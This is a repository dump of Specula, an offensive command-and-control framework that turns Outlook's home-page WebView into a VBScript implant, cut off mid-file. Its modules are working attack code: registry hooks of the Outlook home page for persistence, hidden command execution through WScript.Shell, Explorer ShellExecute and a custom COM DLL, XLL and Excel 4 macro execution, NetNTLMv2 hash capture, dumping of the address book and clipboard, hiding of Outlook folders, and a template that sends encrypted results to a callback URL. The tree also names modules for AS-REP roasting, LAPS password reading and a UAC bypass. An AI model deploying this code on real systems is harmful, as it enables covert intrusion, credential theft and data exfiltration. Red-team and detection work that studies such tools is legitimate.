├── api ├── README.md ├── SpeculaApi │ ├── SpeculaApi.rgs │ ├── SpeculaApi.rc │ ├── SpeculaApips.def │ ├── pch.cpp │ ├── SpeculaApi.def │ ├── targetver.h │ ├── dllmain.h │ ├── dllmain.cpp │ ├── framework.h │ ├── resource.h │ ├── pch.h │ ├── Sepcula.rgs │ ├── SpeculaApi.idl │ └── Sepcula.h └── SpeculaApiPS │ └── SpeculaApiPS.vcxproj.filters ├── release_history.txt ├── requirements.txt ├── data └── payloads │ └── api │ ├── SpeculaApi.dll │ └── SpeculaApi.x64.dll ├── README.md ├── functions ├── operation │ ├── file │ │ ├── create_dir.txt │ │ ├── put_file.txt │ │ ├── list_dir.txt │ │ ├── get_file.txt │ │ ├── check_fileexist.txt │ │ ├── cat_file.txt │ │ ├── move_file.txt │ │ ├── delete_file.txt │ │ ├── create_shortcut.txt │ │ ├── delete_dir.txt │ │ ├── copy_file.txt │ │ ├── copy_dir.txt │ │ ├── list_shortcutinfo.py │ │ ├── download_filehttp.txt │ │ ├── delete_file.py │ │ ├── check_filehash.txt │ │ ├── check_fileexist.py │ │ ├── check_filearch.py │ │ ├── list_acl.py │ │ ├── delete_dir.py │ │ ├── create_dir.py │ │ ├── list_shortcutinfo.txt │ │ ├── copy_file.py │ │ ├── move_file.py │ │ ├── check_filehash.py │ │ ├── copy_dir.py │ │ ├── download_filehttp.py │ │ ├── cat_file.py │ │ ├── zip_content.py │ │ └── check_filearch.txt │ ├── registry │ │ ├── delkeyhkcuregistry.txt │ │ ├── delvaluehkcuregistry.txt │ │ ├── getallkeysregistry.txt │ │ ├── getallvaluesregistry.txt │ │ ├── setvaluehkcuregistry.txt │ │ ├── getvalueregistry.txt │ │ ├── delkeyhkcuregistry.py │ │ └── delvaluehkcuregistry.py │ ├── outlook │ │ ├── stop_outlook.txt │ │ ├── dump_gal.txt │ │ ├── get_emailaddress.txt │ │ ├── changeview_outlookfolder.txt │ │ ├── send_mail.txt │ │ ├── change_outlookfolder.txt │ │ ├── stop_outlook.py │ │ ├── read_contacts.py │ │ ├── get_emailaddress.py │ │ ├── list_overview.py │ │ ├── list_overview.txt │ │ ├── list_notifications.txt │ │ ├── list_notifications.py │ │ ├── read_contacts.txt │ │ ├── read_calendar.py │ │ ├── changeview_outlookfolder.py │ │ ├── read_calendar.txt │ │ ├── read_email.txt │ │ ├── savedraft_filemail.txt │ │ └── read_emailnamedfolder.py │ ├── specula │ │ ├── remove_allowlongscriptruntime.txt │ │ ├── set_allowlongscriptruntime.txt │ │ ├── remove_allowlongscriptruntime.py │ │ └── set_allowlongscriptruntime.py │ └── network │ │ ├── nslookup.txt │ │ ├── netstat.py │ │ ├── netstat.txt │ │ └── nslookup.py ├── api │ ├── run_shell.txt │ ├── verify_api.txt │ ├── load_dll.txt │ ├── load_dll.py │ ├── run_shell.py │ ├── verify_api.py │ └── remove_api.txt ├── enumerate │ ├── host │ │ ├── list_clipboard.txt │ │ ├── list_recentcommands.txt │ │ ├── list_timezone.txt │ │ ├── list_printers.txt │ │ ├── list_startmenu.txt │ │ ├── list_officearch.txt │ │ ├── list_hostsfile.txt │ │ ├── list_windowsarch.txt │ │ ├── list_printers.py │ │ ├── list_environmentvariables.txt │ │ ├── list_windowsversion.txt │ │ ├── list_clipboard.py │ │ ├── list_hotfixes.txt │ │ ├── list_mappeddrives.py │ │ ├── list_services.txt │ │ ├── list_startmenu.py │ │ ├── list_mappeddrives.txt │ │ ├── list_scheduledtasks.py │ │ ├── list_networkcardinfo.py │ │ ├── list_boottime.py │ │ ├── list_ntdomaininfo.py │ │ ├── list_hotfixes.py │ │ ├── list_recyclebin.py │ │ ├── list_installedpowershell.py │ │ ├── list_localusers.py │ │ ├── list_recentfiles.py │ │ ├── list_recentfiles.txt │ │ ├── list_networklogon.py │ │ ├── list_hostsfile.py │ │ ├── list_services.py │ │ ├── list_boottime.txt │ │ ├── list_applocker.py │ │ ├── list_logging.py │ │ ├── list_windowsversion.py │ │ ├── list_timezone.py │ │ ├── list_windowsarch.py │ │ ├── list_processes.py │ │ ├── list_basic.txt │ │ ├── list_officearch.py │ │ ├── list_installedapps.py │ │ ├── list_ntdomaininfo.txt │ │ ├── list_networkcardinfo.txt │ │ ├── list_basic.py │ │ ├── list_installedpowershell.txt │ │ ├── list_networklogon.txt │ │ ├── list_amsiproviders.py │ │ ├── list_iprouting.py │ │ ├── list_amsiproviders.txt │ │ ├── list_localadmins.py │ │ ├── list_gpp.py │ │ ├── list_processes.txt │ │ ├── list_recentcommands.py │ │ ├── list_environmentvariables.py │ │ ├── list_whoami.py │ │ ├── list_localadmins.txt │ │ ├── list_iprouting.txt │ │ ├── list_servicepermissions.py │ │ ├── list_installeddotnet.py │ │ ├── list_localusers.txt │ │ ├── list_recyclebin.txt │ │ ├── list_gpp.txt │ │ ├── list_applocker.txt │ │ ├── list_installedapps.txt │ │ └── list_autoruns.py │ └── ldap │ │ ├── list_computers.py │ │ ├── list_domaininfo.py │ │ ├── list_users.py │ │ ├── list_lapspassword.py │ │ ├── list_passwordpolicy.py │ │ ├── list_passwordnotrequired.py │ │ ├── list_asreproast.py │ │ ├── list_user.py │ │ ├── list_computer.py │ │ ├── list_addcomputertodomain.py │ │ ├── ldap_query.txt │ │ ├── list_domaininfo.txt │ │ ├── list_users.txt │ │ ├── list_asreproast.txt │ │ ├── list_passwordnotrequired.txt │ │ ├── list_computers.txt │ │ ├── list_lapspassword.txt │ │ ├── list_user.txt │ │ ├── list_passwordpolicy.txt │ │ └── list_computer.txt ├── trolling │ ├── set_clipboard.txt │ ├── play_voice.txt │ ├── set_clipboard.py │ └── play_voice.py └── execute │ └── host │ ├── application.txt │ ├── execute_registerxll.txt │ ├── execute_excel4macro.txt │ ├── capture_netntlmv2.txt │ ├── spawnproc_explorer.txt │ ├── migrate_homepage.txt │ ├── wscriptshell.txt │ ├── set_calendarhomepagehook.txt │ ├── wmi_execute.txt │ ├── wmi_killprocpid.txt │ ├── wmi_killprocname.txt │ ├── cmd.txt │ ├── wscriptshell.py │ ├── remove_homepage.py │ ├── cmd.py │ ├── wmi_killprocpid.py │ ├── wmi_execute.py │ ├── execute_registerxll.py │ ├── wmi_killprocname.py │ ├── spawnproc_explorer.py │ ├── migrate_homepage.py │ ├── uac-sdclt.txt │ ├── remove_homepage.txt │ ├── uac-sdclt.py │ ├── application.py │ ├── set_calendarhomepagehook.py │ └── execute_excel4macro.py ├── helperFunctions ├── base_template.txt ├── createstream.txt ├── Delregvalue_hkcu.txt ├── Delregkey_hkcu.txt ├── Getallregkeys.txt ├── dir_creator.txt ├── HexToBytes.txt ├── Setregvalue_hkcu.txt └── base64.txt ├── lib ├── tab_completers │ └── generic.py ├── core │ ├── spectaskbook.py │ └── utility.py ├── handlers │ ├── blacklist.html │ ├── specpayload.py │ ├── dev_blank.html │ ├── specapplication.py │ ├── base.html │ └── redirect_template.html ├── modhandlers │ └── generic.py └── validators │ └── files.py ├── .gitignore ├── hiddenFunctions ├── download_file.txt ├── upload_file.txt └── upload_file.py ├── Taskbooks ├── example.py └── enum_installed_software.py ├── ssl └── ssl-cert-snakeoil.pem └── CONTRIBUTING.md /api/README.md: -------------------------------------------------------------------------------- 1 | # SpeculaApi -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | } 4 | -------------------------------------------------------------------------------- /release_history.txt: -------------------------------------------------------------------------------- 1 | # BUG LIST / KNOWN STUFF: 2 | 3 | VERSION 1.0 4 | Initial Public Release 5 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | urllib3 2 | tornado 3 | requests 4 | jinja2 5 | pyopenssl 6 | pycryptodome 7 | pefile 8 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/api/SpeculaApi/SpeculaApi.rc -------------------------------------------------------------------------------- /data/payloads/api/SpeculaApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/data/payloads/api/SpeculaApi.dll -------------------------------------------------------------------------------- /data/payloads/api/SpeculaApi.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/data/payloads/api/SpeculaApi.x64.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trustedsec/specula/wiki) 2 | -------------------------------------------------------------------------------- /functions/operation/file/create_dir.txt: -------------------------------------------------------------------------------- 1 | Function create_dir() 2 | On error resume next 3 | create_dir = dir_creator({{directory}}) 4 | End Function -------------------------------------------------------------------------------- /helperFunctions/base_template.txt: -------------------------------------------------------------------------------- 1 | 2 | Ohm = "" 3 | Ohm = crypthelper({{ENTRY}}(), ay, True) 4 | rul = requestpage("{{ CALLBACKURL }}", chr(34) & Ohm & chr(34)) -------------------------------------------------------------------------------- /functions/operation/registry/delkeyhkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function DelKey_HKCU_Registry() 2 | On Error Resume Next 3 | DelKey_HKCU_Registry = DelRegKey_HKCU({{PathToKey}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApips.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /functions/operation/outlook/stop_outlook.txt: -------------------------------------------------------------------------------- 1 | Function Stop_Outlook() 2 | On Error Resume Next 3 | window.external.OutlookApplication.Quit() 4 | Stop_Outlook = "Stop Outlook sent" 5 | End Function -------------------------------------------------------------------------------- /functions/operation/registry/delvaluehkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function DelValue_HKCU_Registry() 2 | On Error Resume Next 3 | DelValue_HKCU_Registry = DelRegValue_HKCU({{PathToKey}}, {{Valuename}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /functions/operation/registry/getallkeysregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetAllKeysRegistry() 2 | On Error Resume Next 3 | GetAllKeysRegistry = GetAllRegKeys({{Root}}, {{PathToKey}}, {{Arch}}, {{RootInteger}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /functions/operation/registry/getallvaluesregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetAllValuesRegistry() 2 | On Error Resume Next 3 | GetAllValuesRegistry = Getallregvalues({{Root}}, {{PathToKey}}, {{Arch}}, {{RootInteger}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /functions/operation/registry/setvaluehkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function SetValue_HKCU_Registry() 2 | On Error Resume Next 3 | SetValue_HKCU_Registry = SetRegValue_HKCU({{PathToKey}}, {{RegType}}, {{ValueName}}, {{Value}}) 4 | End Function -------------------------------------------------------------------------------- /lib/tab_completers/generic.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def tab_choice(val, line, **kwargs): 4 | results = [] 5 | for key in kwargs['choices']: 6 | if key.startswith(val): 7 | results.append(key) 8 | return results -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.db 2 | configoptions.py 3 | specConfig.ini 4 | DefaultBlacklist.txt 5 | .vscode/ 6 | specula_log.txt 7 | weblog.log 8 | operator_log.txt 9 | agent_data/ 10 | payloadhosting/ 11 | venv/ 12 | *.pyc 13 | -------------------------------------------------------------------------------- /functions/operation/file/put_file.txt: -------------------------------------------------------------------------------- 1 | Function put_file() 2 | Set fso = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 3 | Set File = fso.GetFile({{destination}}) 4 | put_file = File.size 5 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/dump_gal.txt: -------------------------------------------------------------------------------- 1 | Function dump_gal() 2 | on error resume next 3 | Set GAL = window.external.OutlookApplication.GetNameSpace("MAPI").GetGlobalAddressList().AddressEntries 4 | dump_gal = GAL.Count 5 | End Function -------------------------------------------------------------------------------- /functions/api/run_shell.txt: -------------------------------------------------------------------------------- 1 | Function run_shell_api() 2 | on error resume next 3 | Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | run_shell_api = SpeculaApi.RunShell("{{cmd}}") 5 | End Function -------------------------------------------------------------------------------- /functions/operation/file/list_dir.txt: -------------------------------------------------------------------------------- 1 | Function list_dir() 2 | On error resume next 3 | list_dir = dir_lister({{directory}}, {{depth}}, {{recurselevels}}, {{filetype}}, {{filename}}, {{nodirectories}}, {{sizeformat}}, {{nofiles}}) 4 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/get_emailaddress.txt: -------------------------------------------------------------------------------- 1 | Function get_emailaddress() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")) 4 | get_emailaddress = folder.Folders(1).Folderpath 5 | End Function -------------------------------------------------------------------------------- /functions/operation/registry/getvalueregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetValueRegistry() 2 | On Error Resume Next 3 | GetValueRegistry = GetRegValue({{Root}}, {{PathToKey}}, {{ValueName}}, {{Arch}}, {{RootInteger}}, {{WMIOperation}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.def: -------------------------------------------------------------------------------- 1 | ; SpeculaApi.def : Declares the module parameters. 2 | 3 | LIBRARY 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /functions/operation/file/get_file.txt: -------------------------------------------------------------------------------- 1 | Function get_file() 2 | On Error Resume Next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Set file = fs.GetFile({{file}}) 5 | if IsNull(file) Then Exit Function 6 | get_file = file.size 7 | End Function -------------------------------------------------------------------------------- /lib/core/spectaskbook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class SpecTaskBook(SpecModule): 5 | def __init__(self): 6 | self.entry = "None" 7 | self.depends = [] 8 | super().__init__(None) # we inherit the base properties of a module 9 | 10 | 11 | -------------------------------------------------------------------------------- /functions/api/verify_api.txt: -------------------------------------------------------------------------------- 1 | Function api_verify() 2 | On error resume next 3 | Set specApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | If IsObject(specApi) Then 5 | api_verify = True 6 | else 7 | api_verify = False 8 | End if 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_clipboard.txt: -------------------------------------------------------------------------------- 1 | Function list_clipboard() 2 | On error resume next 3 | Set html = window.external.OutlookApplication.CreateObject("htmlfile") 4 | text = html.ParentWindow.ClipboardData.GetData("text") 5 | list_clipboard = "Clipboard data retrieved: " & vbCrLf & text 6 | End Function -------------------------------------------------------------------------------- /functions/api/load_dll.txt: -------------------------------------------------------------------------------- 1 | Function load_dll 2 | on error resume next 3 | Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | if SpeculaApi.LoadDll("{{dll}}") = 1 Then 5 | load_dll = "True" 6 | Else 7 | load_dll = "False" 8 | End If 9 | End Function 10 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentcommands.txt: -------------------------------------------------------------------------------- 1 | Function list_recentcommands() 2 | On error resume next 3 | list_recentcommands = "RECENT COMMANDS:" & vbCrLf 4 | list_recentcommands = list_recentcommands & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", 64, 2147483649) 5 | End Function -------------------------------------------------------------------------------- /functions/trolling/set_clipboard.txt: -------------------------------------------------------------------------------- 1 | Function set_clipboard() 2 | On error resume next 3 | Set html = window.external.OutlookApplication.CreateObject("htmlfile") 4 | text = html.ParentWindow.ClipboardData.SetData("text", {{clipboardtext}}) 5 | set_clipboard = "Clipboard data set to: " & {{clipboardtext}} 6 | End Function -------------------------------------------------------------------------------- /functions/execute/host/application.txt: -------------------------------------------------------------------------------- 1 | Function Execute_Application() 2 | On Error Resume Next 3 | Set app = window.external.OutlookApplication.CreateObject({{com_application}}) 4 | app.Visible = false 5 | Execute_Application = "Command executed: OutlookApplication.CreateObject(" & {{com_application}} & ")" 6 | End Function 7 | -------------------------------------------------------------------------------- /functions/trolling/play_voice.txt: -------------------------------------------------------------------------------- 1 | Function play_voice() 2 | On error resume next 3 | Set speech = window.external.OutlookApplication.CreateObject("sapi.spvoice") 4 | Set speech.Voice = speech.GetVoices.Item({{voicegender}}) 5 | speech.speak{{speaktext}} 6 | play_voice = "Your speaktext was sent to the speaker as voice. Mohahaha" 7 | End Function -------------------------------------------------------------------------------- /functions/execute/host/execute_registerxll.txt: -------------------------------------------------------------------------------- 1 | Function execute_registerxll() 2 | On Error Resume Next 3 | Set excel = window.external.OutlookApplication.CreateObject("Excel.Application") 4 | excel.Visible = false 5 | return_data = excel.RegisterXLL({{input}}) 6 | execute_registerxll = "XLL Executed: " & return_data 7 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/remove_allowlongscriptruntime.txt: -------------------------------------------------------------------------------- 1 | Function RemoveAllowLongScriptRuntime() 2 | On error resume next 3 | te = DelRegValue_HKCU("Software\Microsoft\Internet Explorer\Styles", "MaxScriptStatements") 4 | RemoveAllowLongScriptRuntime = "HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements has been removed" 5 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /functions/execute/host/execute_excel4macro.txt: -------------------------------------------------------------------------------- 1 | Function execute_excel4macro() 2 | On Error Resume Next 3 | Set excel = window.external.OutlookApplication.CreateObject("Excel.Application") 4 | excel.Visible = false 5 | return_data = excel.ExecuteExcel4Macro("CALL({{input}})") 6 | execute_excel4macro = "Data returned: " & return_data 7 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/changeview_outlookfolder.txt: -------------------------------------------------------------------------------- 1 | Function changeview_outlookfolder() 2 | on error resume next 3 | Set folder = window.external.OutlookApplication.GetNameSpace("MAPI").GetDefaultFolder({{ folder }}) 4 | Set window.external.OutlookApplication.ActiveExplorer.CurrentFolder = folder 5 | changeview_outlookfolder = "Changed View to: " & folder 6 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 2 | 3 | class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_SpeculaApiLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_SPECULAAPI, "{5be8ef76-6253-482a-926e-d1d877de3b63}") 8 | }; 9 | 10 | extern class CSpeculaApiModule _AtlModule; 11 | -------------------------------------------------------------------------------- /functions/execute/host/capture_netntlmv2.txt: -------------------------------------------------------------------------------- 1 | Function capture_netntlmv2() 2 | On Error Resume Next 3 | Set oHTTP = window.external.OutlookApplication.CreateObject("MSXML2.ServerXMLHTTP.6.0") 4 | oHTTP.SetProxy 2, {{ webserver_address }}, "*" 5 | oHTTP.setRequestHeader "User-Agent", {{ useragent }} 6 | oHTTP.open "GET", {{ url }}, False 7 | oHTTP.send 8 | End Function -------------------------------------------------------------------------------- /functions/operation/file/check_fileexist.txt: -------------------------------------------------------------------------------- 1 | Function check_fileexist() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FileExists({{file}}) Then 5 | check_fileexist = "File Exist: " & {{file}} & " - True" 6 | else 7 | check_fileexist = "File Exist: " & {{file}} & " - False" 8 | End If 9 | End Function -------------------------------------------------------------------------------- /helperFunctions/createstream.txt: -------------------------------------------------------------------------------- 1 | Function CreateStream(hex_string) 2 | Dim TEMPdec, TEMPstm 3 | Set TEMPstm = window.external.OutlookApplication.CreateObject("System.IO.MemoryStream") 4 | TEMPdec = HexToBytes(hex_string) 5 | 6 | For Each i In TEMPdec 7 | TEMPstm.WriteByte i 8 | Next 9 | TEMPstm.Position = 0 10 | Set CreateStream = TEMPstm 11 | End Function 12 | 13 | 14 | -------------------------------------------------------------------------------- /functions/execute/host/spawnproc_explorer.txt: -------------------------------------------------------------------------------- 1 | Function Spawn_Explorer() 2 | On Error Resume Next 3 | set app = window.external.OutlookApplication.CreateObject("Shell.Application").Windows 4 | set appobj = app.item() 5 | appobj.Document.Application.ShellExecute {{command}}, {{arguments}}, "", "", 0 6 | Spawn_Explorer = "Command spawned under explorer: " & {{command}} & " " & {{arguments}} 7 | End Function 8 | -------------------------------------------------------------------------------- /functions/execute/host/migrate_homepage.txt: -------------------------------------------------------------------------------- 1 | Function Execute_MigrateHomepage() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\" + version + "\outlook\webview\inbox" 5 | SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}}) 6 | Execute_MigrateHomepage = "Registry updated to point to new Specula server" 7 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/set_allowlongscriptruntime.txt: -------------------------------------------------------------------------------- 1 | Function AllowLongScriptRuntime() 2 | On error resume next 3 | te = SetRegValue_HKCU("Software\Microsoft\Internet Explorer\Styles", "REG_DWORD", "MaxScriptStatements", "4294967295") 4 | AllowLongScriptRuntime = "HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements set to 0xffffffff to allow long script runtime - restart Outlook for it to take effect" 5 | End Function -------------------------------------------------------------------------------- /helperFunctions/Delregvalue_hkcu.txt: -------------------------------------------------------------------------------- 1 | Function DelRegValue_HKCU(PathToKey, ValueName) 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.DeleteValue 2147483649, PathToKey, ValueName 6 | DelRegValue_HKCU = ValueName & " Deleted successfully under " & PathToKey 7 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_timezone.txt: -------------------------------------------------------------------------------- 1 | Function list_timezone() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "TimeZoneKeyName", strtimezone 6 | list_timezone = strtimezone 7 | End Function -------------------------------------------------------------------------------- /lib/handlers/blacklist.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Outlook 6 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /functions/operation/outlook/send_mail.txt: -------------------------------------------------------------------------------- 1 | Function send_mail() 2 | on error resume next 3 | Set objMail = window.external.OutlookApplication.CreateItem(0) 4 | objMail.to = {{ recipient }} 5 | objMail.Subject = {{ subject }} 6 | objMail.Body = {{ body }} 7 | 'objMail.Attachments.Add(NewName) 8 | objMail.DeleteAfterSubmit = {{ delete_after_sent }} 9 | objMail.Send 10 | send_mail = "Sent mail to:" & {{ recipient }} 11 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wscriptshell.txt: -------------------------------------------------------------------------------- 1 | Function Execute_WscriptShell() 2 | On Error Resume Next 3 | Const HIDDEN_WINDOW = 0 4 | Set ws = window.external.OutlookApplication.CreateObject("Wscript.shell") 5 | 6 | inetret = ws.Run({{command}}, 0, false) 7 | If intret <> 0 Then 8 | Execute_WscriptShell = "Error running program" 9 | End If 10 | Execute_WscriptShell = "Command Executed: " & {{command}} & vbCrLf & intret 11 | End Function -------------------------------------------------------------------------------- /hiddenFunctions/download_file.txt: -------------------------------------------------------------------------------- 1 | Function download_file() 2 | On Error Resume Next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Set file = fs.GetFile({{file}}) 5 | if IsNull(file) Then Exit Function 6 | With file.OpenAsTextStream() 7 | .Skip({{startloc}}) 8 | readBinary = .Read({{chunksize}}) 9 | .Close 10 | End With 11 | download_file = readBinary 12 | End Function -------------------------------------------------------------------------------- /functions/execute/host/set_calendarhomepagehook.txt: -------------------------------------------------------------------------------- 1 | Function set_calendarhomepagehook() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\" + version + "\outlook\webview\calendar" 5 | SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}}) 6 | set_calendarhomepagehook = "Specula hook added to calendar webview - url: " & {{homepageurl}} 7 | End Function -------------------------------------------------------------------------------- /functions/operation/file/cat_file.txt: -------------------------------------------------------------------------------- 1 | Function cat_file() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists({{file}}) = True Then 5 | set ReadFile = fs.OpenTextFile({{file}}, 1) 6 | content = ReadFile.ReadAll 7 | else 8 | content = "File not found" 9 | End If 10 | cat_file = "Content of file " & {{file}} & ":" & vbCrLf & content 11 | End Function -------------------------------------------------------------------------------- /functions/operation/file/move_file.txt: -------------------------------------------------------------------------------- 1 | Function move_file() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FileExists({{file}}) Then 5 | fs.MoveFile {{file}}, {{destination}} 6 | move_file = "Move File: " & {{file}} & " to " & {{destination}} 7 | else 8 | move_file = "Move File: File Does Exist Exist: " & {{file}} 9 | End If 10 | End Function -------------------------------------------------------------------------------- /lib/handlers/specpayload.py: -------------------------------------------------------------------------------- 1 | import tornado 2 | from urllib.parse import urlparse 3 | from lib.core.setup import gconfig 4 | 5 | class PayloadHandler(tornado.web.StaticFileHandler): 6 | def set_default_headers(self): 7 | self.set_header('Server', gconfig.SERVER_HEADER) 8 | 9 | #def write_error(self, status_code, **kwargs): 10 | # if status_code == 404: 11 | # self.redirect('http://example.com') # Fetching a default resource 12 | -------------------------------------------------------------------------------- /api/SpeculaApi/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 2 | 3 | #include "pch.h" 4 | #include "framework.h" 5 | #include "resource.h" 6 | #include "SpeculaApi_i.h" 7 | #include "dllmain.h" 8 | 9 | CSpeculaApiModule _AtlModule; 10 | 11 | // DLL Entry Point 12 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 13 | { 14 | hInstance; 15 | return _AtlModule.DllMain(dwReason, lpReserved); 16 | } 17 | -------------------------------------------------------------------------------- /functions/operation/outlook/change_outlookfolder.txt: -------------------------------------------------------------------------------- 1 | Function change_outlookfolder() 2 | on error resume next 3 | Value = {{ hidden }} 4 | PropName = "http://schemas.microsoft.com/mapi/proptag/0x10F4000B" 5 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder({{ folder }}) 6 | Set oPA = folder.PropertyAccessor 7 | oPA.SetProperty PropName, Value 8 | change_outlookfolder = "Folder: " & folder & " - Hidden set to: " & Value 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_printers.txt: -------------------------------------------------------------------------------- 1 | Function list_printers() 2 | On error resume next 3 | Set wsh = window.external.OutlookApplication.CreateObject("Wscript.Network") 4 | Set printers = wsh.EnumPrinterConnections 5 | For i = 0 to printers.Count - 1 Step 2 6 | output = output & "Printername: " & printers.Item(i+1) & " - Port: " & printers.Item(i) & vbCrLf 7 | Next 8 | list_printers = "Found " & printers.count & " printers:" & vbCrLf & output 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_startmenu.txt: -------------------------------------------------------------------------------- 1 | Function list_startmenu() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("Select Name from Win32_LogicalProgramGroupItem") 6 | 7 | For Each objItem in colItems 8 | list_startmenu = list_startmenu & objItem.Name & vbCrLF 9 | Next 10 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef STRICT 4 | #define STRICT 5 | #endif 6 | 7 | #include "targetver.h" 8 | 9 | #define _ATL_APARTMENT_THREADED 10 | 11 | #define _ATL_NO_AUTOMATIC_NAMESPACE 12 | 13 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 14 | 15 | 16 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW 17 | 18 | #include "resource.h" 19 | #include 20 | #include 21 | #include 22 | -------------------------------------------------------------------------------- /functions/operation/file/delete_file.txt: -------------------------------------------------------------------------------- 1 | Function delete_file() 2 | On error resume next 3 | Set fs = 